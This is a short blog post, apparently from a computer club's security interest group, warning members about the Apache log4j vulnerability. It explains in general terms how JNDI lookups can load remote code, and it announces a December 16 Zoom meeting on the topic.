A LOT of coverage in news outlets about "worst vulnerability ever", "Internet on fire", and similar stories.
We will cover the details in the Cyber Security SIG meeting December 16 at 3pm via zoom. The session/presentation will be audio recorded so view the posted presentation notes if you want the details - as they become more known.
The vulnerability is in the Apache log4j library. Most applications are developed then deployed using stock libraries for common functions. Logging is a common function and the Apache log4j library is a very popular application inclusion.
Very popular.
Thus applications used in both server applications, client applications, browsers, and social media platforms - to name a few.
So applications using Java include the log4j class, set parameters, and use the log4j library to handle application logging.
Some detail: The Java Naming and Directory Interface (JNDI) provides naming and directory functions to Java applications. So an application needs/wants to log something - anything. If the API encounters a JNDI reference the API will to to the supplied resource and fetch whatever it needs to resolve the requested variable. It is possible to download remote classes and execute them.
A simple Proof of Concept (PoC) was released recently. Exploits rapidly increased in frequency and severity.
Any and everything may need a update.
Applications, sites, platforms, cloud services, Twitter, should be used with caution.
DHS and most national cyber agencies are issuing warnings. Please head them.
UPDATE: The patch might be worse than the exploit.
VERY HEAVY scanning for vulnerable systems continues to increase.
No comments:
Post a Comment